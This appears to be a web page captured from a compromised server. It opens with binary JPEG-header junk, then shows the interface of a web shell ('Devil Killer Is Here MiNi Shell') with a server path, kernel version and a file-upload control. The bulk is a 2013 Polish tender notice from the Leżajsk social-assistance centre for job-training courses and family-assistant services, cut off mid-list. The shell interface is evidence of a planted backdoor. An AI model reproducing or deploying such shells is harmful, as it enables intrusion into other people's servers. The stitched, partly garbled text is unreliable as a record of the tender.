JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130527/90833-N-2013.html

<p class="kh_header"><b>Leżajsk: Organizacja i przeprowadzenie warsztatów i kursów zawodowych oraz wykonanie usługi Asystenta Rodziny w ramach realizacji projektu systemowego- Czas na aktywność w gminie Leżajsk</b><br>
<b>Numer ogłoszenia: 90833 - 2013; data zamieszczenia: 27.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Opalińskiego 2, 37-300 Leżajsk, woj. podkarpackie, tel. 017 240 61 43, faks 017 240 61 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.lezajsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie warsztatów i kursów zawodowych oraz wykonanie usługi Asystenta Rodziny w ramach realizacji projektu systemowego- Czas na aktywność w gminie Leżajsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Organizacja i przeprowadzenie warsztatów i kursów zawodowych oraz wykonanie usługi Asystenta Rodziny w ramach realizacji projektu systemowego Czas na aktywność w gminie Leżajsk współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1- Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1-  Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Projekt skierowany jest do 15 osób bezrobotnych, nieaktywnych zawodowo, rolników, zamieszkujących na terenie gminy Leżajsk.

Na realizację zadania składają się:
- przeprowadzenie treningu kompetencji społecznych,
- przeprowadzenie indywidualnego doradztwa zawodowego,
- przeprowadzenie indywidualnego poradnictwa psychologicznego,
- przeprowadzenie indywidualnego treningu psycho - motywacyjnego,
- przeprowadzenie treningu kompetencji wychowawczych ,
- przeprowadzenie kursów zawodowych zakończonych egzaminem,
- przeprowadzenie kursów prawa jazdy zakończonych egzaminem,
- wykonanie usługi Asystenta Rodziny.

I.	Trening kompetencji społecznych - zajęcia grupowe dla 14 Uczestników Projektu w wymiarze 40 godzin dydaktycznych w formie  warsztatów prowadzonych przez  psychologa.

W ramach treningu kompetencji społecznych oczekuje się poruszenie takich tematów:
- komunikacja interpersonalna,
- komunikacja werbalna i niewerbalna,
- budowanie właściwych relacji i umiejętności społecznych,
- budowanie wizerunku własnej osoby,
- samoakceptacja,
- przyczyny porażek i sukcesów,
- poznanie własnej osoby,
- analiza mocnych i słabych stron,
- stres,
- asertywność,
- relacje z innymi ludźmi,
- wyznaczanie celów, motywowanie do zmian,
- motywowanie do aktywnego działania,

Miejsce zajęć: miasto Leżajsk
Termin realizacji:   maj-czerwiec  2013 r.

II. Indywidualna praca z doradcą zawodowym w wymiarze 3 godzin dydaktycznych dla 14 Uczestników Projektu. 

W ramach warsztatów z doradcą zawodowym przewiduje się poruszenie między innymi
następujących zagadnień:
- rynek pracy w powiecie i Polsce,
- określenie zainteresowań i preferencji zawodowych,
- przygotowanie dokumentów aplikacyjnych,
- rozmowa  kwalifikacyjna z elementami autoprezentacji/ przygotowanie do rozmowy   
  kwalifikacyjnej, promocja własnej osoby/,
- techniki poszukiwania pracy,
- analiza SWOT,
- komunikacja interpersonalna,
- opracowanie indywidualnego planu działania IPD dla każdego uczestnika projektu.
Wykorzystywane narzędzia to m.in. Miasteczko Zainteresowań Zawodowych.

Miejsce szkolenia: miasto Leżajsk
Termin realizacji: czerwiec 2013 r.

III. Indywidualne poradnictwo psychologiczne w wymiarze 4 godzin dydaktycznych dla 14 Uczestników Projektu.

Tematyka tych spotkań uzależniona będzie od indywidualnych potrzeb każdej osoby. 
Miejsce szkolenia: miasto Leżajsk  
Termin realizacji: sierpień  2013 r.

IV. Indywidualny trening psycho - motywacyjny dla 1 Uczestnika Projektu w wymiarze 4 godzin dydaktycznych.

Miejsce szkolenia: miasto Leżajsk  
Termin realizacji: sierpień  2013 r.


V. Warsztaty kompetencji wychowawczych w formie zajęć grupowych w wymiarze 30 godzin dydaktycznych dla 12 Uczestników Projektu.

Zakres tematyczny spotkań:
- radzenie sobie z przykrymi emocjami u dziecka
- uczucia rodzic - dziecko
- granice w relacjach z innymi ludźmi,
- wychowywanie do samodzielności,
- rozwiązywanie konfliktów,
- aktywne słuchanie 
- umiejętność komunikowania się z dziećmi
- motywowanie do zmian.

Miejsce szkolenia: miasto Leżajsk  
Termin realizacji:  październik 2013 r. 


VII. Kursy zawodowe            
W ramach projektu Czas na aktywność w gminie Leżajsk realizowanego przez Gminny Ośrodek Pomocy Społecznej w Leżajsku przewiduje się realizację wymienionych poniżej szkoleń, będących przedmiotem zamówienia:


1. Opiekun osoby starszej

Liczba uczestników:  3  osoby.
Ilość godzin szkoleniowych: 80 godzin.
Program szkolenia powinien obejmować:
-          Wybrane zagadnienia prawne
-	Podstawy psychologii
-	Podstawy psychiatrii
 - 	Gerontologia
 - 	Dietetyka i przygotowywanie posiłków
 - 	Podstawy higieny i pielęgnacji
 - 	Publiczna służba zdrowia oraz system pomocy społecznej
 -	Organizacja pracy własnej
-	Zasady BHP - udzielanie pierwszej pomocy przedlekarskiej
 - 	Etyka w zawodzie opiekunki
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: opiekun osób starszych.
Miejsce szkolenia: część teoretyczna i praktyczna - miasto Leżajsk.
Termin realizacji:  czerwiec - wrzesień  2013 r.


2. Profesjonalny sprzedawca z obsługą kasy fiskalnej oraz gospodarka magazynowa.
   
Liczba uczestników:  5 osób.
Ilość godzin szkoleniowych: 100 godzin.
Program szkolenia powinien obejmować:
-  Wiedza o konsumencie                                 
 -  Sklep detaliczny i jego wyposażenie
 -  Marketing handlowy
 -  Organizacja pracy w sklepie
 -  Zaopatrzenie sklepu w towary
 -  Technika sprzedaży detalicznej
 -  Czynności rachunkowo - kasowe
 -  Trening umiejętności sprzedaży i obsługi klienta
 -  Obsługa kas fiskalnych
-  Aspekty sanitarno - higieniczne w zakładach produkcji i obrotu środkami   spożywczymi
-  Gospodarka magazynowa
-  Zagadnienia z zakresu HACCP tj. praktyczne wdrażanie zasad systemu zarządzania bezpieczeństwem w małych i średnich zakładach branży spożywczej

Celem szkolenia jest opanowanie przez uczestników czynności niezbędnych do wykonywania zawodu: sprzedawcy, kasjera, handlowca, magazyniera.
Miejsce szkolenia: miasto Leżajsk.
Termin realizacji: czerwiec -  wrzesień 2013 r.

3. Florystyka
Liczba uczestników:  1 osoba.
Ilość godzin szkoleniowych: 100 godzin.
Program szkolenia powinien obejmować:
-faza zbioru roślin
-przechowywanie roślin
-techniki suszenia roślin
-techniki utrwalania roślin
-zasady doboru kwiatów do kompozycji
-techniki układania kwiatów
-stroiki i girlandy
-podstawy decoupage

Celem szkolenia jest przygotowanie Uczestnika do wykonywania zawodu florysty.                                            
Miejsce szkolenia: miasto Leżajsk dopuszcza się możliwość zorganizowania szkolenia                 w innym miejscu jeżeli zajdzie taka konieczność.
Termin realizacji: czerwiec - wrzesień 2013 r.


4. Przedstawiciel handlowy wraz z kursem prawa jazdy.
Liczba uczestników:  5 osób na szkolenie zawodowe, 3 osoby na kurs prawa jazdy.
Ilość godzin szkolenia zawodowego: 120 godzin dla 1 osoby. 
Ilość godzin kursu prawa jazdy: 30 godz. teoretycznych i 30 godzin praktycznych wraz       z egzaminem i jednym egzaminem poprawkowym oraz niezbędnymi badaniami lekarskimi.

Miejsce szkolenia: miasto Leżajsk dopuszcza się możliwość zorganizowania szkolenia przedstawiciel handlowy w innym miejscu, jeżeli zajdzie taka konieczność. 
Kurs prawa jazdy - miasto Leżajsk /zajęcia teoretyczne/, zajęcia praktyczne do ustalenia.

Program szkolenia powinien obejmować:
- zagadnienia wstępne dotyczące pracy przedstawiciela handlowego
- planowanie i organizacja pracy
- komunikacja w bezpośredniej relacji z klientem
- przygotowanie i organizacja spotkania z klientem
- przeprowadzenie aktualnej analizy sytuacyjnej rynku
- przygotowanie sprzedaży
- cechy dobrego przedstawiciela handlowego
- metody pozyskiwania klientów
- analizowanie i interpretowanie informacji marketingowej

Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu przedstawiciel handlowy.
Miejsce szkolenia: miasto Leżajsk.
Termin realizacji: czerwiec - wrzesień 2013 r.

5. Spawacz MAG I stopnia.
Liczba uczestników:  1 osoba.
Ilość godzin szkoleniowych: 140 godzin.
Program szkolenia powinien obejmować :
- zagadnienia dotyczące niezbędnych materiałów, urządzeń i sprzętu w procesach spawania metodą MAG 
- bezpieczeństwo i higiena pracy
- urządzenia spawalnicze
- zastosowanie elektryczności do spawania łukowego
- bezpieczna praca na hali produkcyjnej
- materiały dodatkowe do spawania
- spawanie w praktyce
- oznaczenie i wymiarowanie spoin
- metody przygotowania złączy do spawania
- budowa i użytkowanie urządzeń do spawania MAG
- materiały dodatkowe do spawania
- charakterystyka spawania MAG oraz typowe parametry

Celem szkolenia jest przygotowanie uczestnika do wykonywania zawodu spawacz              MAG I stopnia. Wykonawca zapewni odzież ochronną i książeczkę spawacza.
Miejsce szkolenia: miasto Leżajsk dopuszcza się możliwość zorganizowania szkolenia             w innym miejscu jeżeli zajdzie taka konieczność.

Termin realizacji: czerwiec - wrzesień 2013 r.

VI. Asystent Rodziny 

Głównym obszarem pracy Asystenta Rodziny będzie kompleksowa pomoc rodzinie dysfunkcyjnej, wsparcie i aktywizacja  rodziny z problemami opiekuńczo-wychowawczymi biorącej udział w projekcie  a w szczególności:
- pomoc w rozwiązywaniu podstawowych problemów socjalnych
- pomoc w rozwiązywaniu problemów opiekuńczo-wychowawczych
- pomoc rodzinom w rozwiązywaniu podstawowych problemów psychologicznych
- wspierania aktywności społecznej
- motywowanie do podnoszenia kwalifikacji zawodowych
- pomoc w poszukiwaniu, podejmowaniu i utrzymaniu pracy zarobkowej
- prawidłowe zarządzanie budżetem domowym
- pomoc w prowadzeniu gospodarstwa domowego
- systematyczne wizyty w miejscu zamieszkania rodziny objętej wsparciem
- stała współpraca z pracownikami socjalnymi Gminnego Ośrodka Pomocy Społecznej          w  Leżajsku, środowiskiem lokalnym i innymi instytucjami
- prowadzenie dokumentacji w zakresie w/w działań
Asystent Rodziny ma pracować z jedną rodziną w wymiarze 6 godzin tygodniowo                    w dniach od poniedziałku do piątku w okresie od czerwca 2013 r. do listopada           2013 r. w  łącznej liczbie 156 godzin w  godzinach ustalonych z rodziną.


Wymagane jest aby zajęcia odbywały się w godzinach i dniach dostosowanych do potrzeb Uczestników Projektu.
- Zajęcia szkoleniowe mają odbywać się od poniedziałku do piątku wyjątkowo w sobotę.
 Maksymalna ilość godzin  - 8 godzin dydaktycznych dziennie.
-Zaleca się, aby trening kompetencji społecznych i indywidualne poradnictwo psychologiczne prowadził ten sam specjalista. 
- Kursy zawodowe mają składać się z części teoretycznej i części praktycznej ,
- Wykonawca ma przedłożyć harmonogram szkoleń ( harmonogram będzie zawierał przede wszystkim szczegółowy program i terminy szkoleń, miejsce szkoleń, metody szkolenia, przewidzianą ilość godzin zajęć teoretycznych i praktycznych).
- Wykonawca ponosi wszelkie koszty związane z realizacją zamówienia z uwzględnieniem obowiązujących w tym zakresie przepisów prawa.
- Wykonawca zapewnia: sale szkoleniowe, sprzęt dydaktyczny, materiały szkoleniowe dla Uczestników w formie papierowej i elektronicznej zawierające informacje z poszczególnych szkoleń jak i odpowiednie akty prawne.
- Wykonawca zapewni warunki w czasie szkoleń zgodne z przepisami BHP w dostosowaniu do liczby uczestników, a w szczególności temperatura w pomieszczeniu powinna być adekwatna do warunków atmosferycznych panujących na zewnątrz.

- Wykonawca jest zobowiązany zabezpieczyć każdemu uczestnikowi szkolenia catering 
(1 dzień szkolenia)
a) Serwis kawowy w tym:
- dwa rodzaje ciastek suchych - 20 dag. na osobę
- woda mineralna gazowana ? litra, butelka plastikowa - 1 szt. na osobę
- woda mineralna niegazowana ? litra, butelka plastikowa - 1 szt. na osobę
- herbata bez ograniczeń na osobę,
- kawa rozpuszczalna i  sypana - 2 filiżanki kawy na osobę, 
- śmietanka do kawy w płynie w opakowaniach jednorazowych - 20 gram na osobę,
- 1 czajnik elektryczny do dyspozycji uczestników oraz naczynia jednorazowe, 
- cukier biały.

b) Obiad ( w ciągu jednego efektywnego dnia zajęć) jednodaniowy, składający się z:
- ziemniaki, ryż, kasza lub frytki - 200 g na osobę
- kotlet, sztuka mięsa (np. udko) lub ryba - 200 g na osobę
- zestaw surówek min. 2 szt. - 150 g na osobę 
Zapewnienie obiadu uczestnikowi kursu jeżeli czas przekracza 4 godziny dziennie.
Koszty, o których mowa powyżej należy wliczyć w ogólny koszt szkolenia i uwzględnić w szczegółowym zestawieniu kosztów.
- Wykonawca zapewnia materiały szkoleniowe, które zostaną przekazane uczestnikom na własność.
1. Materiały dla każdego uczestnika:
a) teczka A4 z rączką plastikową,
- wykonana z utwardzonego kartonu,
- pokryta ekologiczną folią polipropylenową,
- zamykana na zatrzask,

b) notatnik format A4-kratka
c) długopis niebieski 

2. Materiały dydaktyczne w tym:
a) skrypty ( opracowanie własne - oryginał), tematycznie związane z kursem
oraz dostarczenie 1 egzemplarza w/w materiałów szkoleniowych do dokumentacji projektowej,
 - Wykonawca zobowiązany jest do wyposażenia każdego Uczestnika Projektu w publikacje książkowe tematycznie związane z kursem zawodowym,    
- Wykonawca  ponosi koszty dojazdu Uczestników Projektu na szkolenia i warsztaty  najtańszym środkiem komunikacji. Wykonawca zobowiązany jest do dostarczenia Zamawiającemu dokumentacji dotyczącej rozliczenia kosztów dojazdu Uczestników Projektu. Wykonawca przedstawia Zamawiającemu  oryginał i kopię kompletu biletów z jednego dnia oraz listę wypłaty potwierdzającą zwrot za poniesiony koszt dojazdu.  

-Wykonawca pokrywa koszty niezbędnych badań lekarskich Uczestników danego szkolenia  jeżeli specyfika kursu tego wymaga, ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków (podczas szkolenia, w drodze na szkolenie i ze szkolenia).
-Wykonawca zapewni, że program i przeprowadzenie szkoleń będzie zgodne z obowiązującymi przepisami prawa (m.in. Rozporządzenie Ministra Edukacji Narodowej oraz Ministra Pracy i Polityki Socjalnej z dnia 12 października 1993 r. w sprawie zasad warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. z 1993 r. Nr 103, poz. 472 z późn. zm).
-Szkolenie ma zakończyć się oceną zdobytych umiejętności oraz wydaniem stosownego dokumentu: certyfikatu, dyplomu lub zaświadczenia o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006 r. Nr 31 poz. 216). Wydane certyfikaty muszą zawierać logo Europejskiego Funduszu Społecznego oraz informację, że projekt był współfinansowany ze środków EFS.
-Wykonawca ma dostarczyć Zamawiającemu pełną dokumentację szkoleń tj. m.in. kserokopie dziennika zajęć edukacyjnych zawierającego tematy zajęć i wymiar godzin oraz listę obecności z własnoręcznymi podpisami uczestników szkoleń, potwierdzenia odbioru materiałów szkoleniowych; potwierdzenia skorzystania z cateringu i przerw kawowych; kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie określonych kwalifikacji.
-Wykonawca zapewnia przeprowadzenie badania  ewaluacyjnego  przed rozpoczęciem warsztatów, kursów i po ich zakończeniu oraz doręczenie materiałów z tych badań Zamawiającemu,  
-Wykonawca zapewnia dokumentację z pracy Asystenta Rodziny a mianowicie miesięczne dzienniki czasu  pracy z rodziną, listę obecności Asystenta Rodziny potwierdzoną przez Uczestnika Projektu.
Zamawiający przewiduje możliwość zmiany osób uczestniczących                                                          w poszczególnych szkoleniach. Łączna liczba osób nie przekroczy  15 osób.
W przypadku zakończenia udziału w projekcie lub rezygnacji Uczestnika z udziału w projekcie przewiduje się możliwość uczestnictwa osoby z listy rezerwowej a tym samym możliwość przeprowadzenia dla niej kursu zawodowego zgodnie z jej propozycją. Zmiana rodzaju szkolenia może być podyktowana również wynikiem pracy Uczestnika Projektu  z doradcą zawodowym.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku.
Ocena spełniania warunku zostanie dokonana na podstawie złożonego oświadczenia na zasadzie: spełnia/niespełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: Zamawiający uzna warunek za spełniony w sytuacji, gdy Wykonawca wykaże się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, głównych usług tj.: co najmniej jednej usługi szkoleniowej o wartości brutto co najmniej 60 000,00 zł wykonanej lub wykonywanej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg załącznika nr 4 do siwz.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów złożonych przez wykonawcę na zasadzie SPEŁNIA/NIESPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania warunku zostanie dokonana na podstawie złożonego oświadczenia na zasadzie: spełnia/niespełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:  Zamawiający uzna warunek za spełniony w sytuacji, gdy Wykonawca wykaże, że dysponuje:

a) trenerem treningu kompetencji wychowawczych,	
b)  trenerem treningu kompetencji społecznych,
c)  trenerem treningu psycho - motywacyjnego,
d)  psychologiem,
e) doradcą zawodowym pierwszego stopnia (zgodnie z art. 94 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy Dz. U. z 2008 r. Nr 69 poz. 415 z późn. zm.) 
f) co najmniej 1 osobą posiadającą wykształcenie w zakresie profilaktyki społecznej,
g) co najmniej jedną osobą, która będzie wykonywać usługę Asystenta Rodziny posiadającą wykształcenie wyższe na kierunku:
- pedagogika lub
- psychologia lub
- socjologia lub
- nauki o rodzinie lub
- praca socjalna,
h) instruktorem nauki jazdy pojazdami kategorii B.  
Uwaga 1: 
1) Osoby wymienione w ppkt a, b, c, d, e, f winny legitymować się co najmniej 3 letnim okresem doświadczenia.
2) Osoba wymieniona w ppkt g winna legitymować się co najmniej rocznym okresem doświadczenia w pracy z rodziną.
3) Osoba wymieniona w ppkt h winna legitymować się co najmniej rocznym okresem doświadczenia jako instruktor nauki jazdy pojazdami w kategorii B.
Uwaga 2: Wykonawca musi dysponować co najmniej 1 osobą wskazaną do kierowania szkoleniami, posiadającą doświadczenie w kierowaniu co najmniej jednym projektem- obejmującym usługi szkoleniowe  o wartości brutto minimum 60 000,00 zł.

W/w osoby należy wymienić w załączniku nr 5 do siwz. 

Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów złożonych przez wykonawcę na zasadzie SPEŁNIA/NIESPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania warunku zostanie dokonana na podstawie złożonego oświadczenia na zasadzie: spełnia/niespełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

